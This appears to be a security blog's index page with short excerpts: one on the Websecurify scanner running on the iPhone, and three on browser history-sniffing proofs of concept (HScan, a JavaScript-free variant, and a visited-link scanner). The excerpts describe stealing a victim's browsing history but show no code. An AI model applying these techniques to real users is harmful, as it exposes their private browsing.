Well Websecurify Runs on The iPhone

This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too.

The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

more | comments | comments rss | posted by

Noscript HScan

After releasing my Firefox specific history scanner, RSnake came up with his own bleeding edge history scanning technique which is based on Jeremiah Grossman’s implementation but it does not require JavaScript. This approach has its own limitations and advantages.

On the advantages side, you don’t really need JavaScript to steal the victim’s browser history anymore. [...]

more | comments | comments rss | posted by

HScan Redux

Inspired by Michal Zalewski‘s recent Firefox bug hunt, I decided to give it a go and see what I can come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific browser bugs.

This vulnerability is not a reworked version of Jeremiah Grossman history hack. It is completely different and it should be treated as a new issue. [...]

more | comments | comments rss | posted by

JavaScript Visited Link Scanner

This is a technique which I learned from Jeremiah Grossman and his presentation on JavaScript malware. Please, keep all the credits for this finding to Jeremiah.

The POC presented here is my improved version of the POC presented in BlackHat. I made it work in IE6, IE7, Firefox and Opera. My main challenge was IE6. IE6 is very nasty when dealing with dynamically generated style sheets. However, these can be easy solved by reusing the current style sheet. [...]

more | comments | comments rss | posted by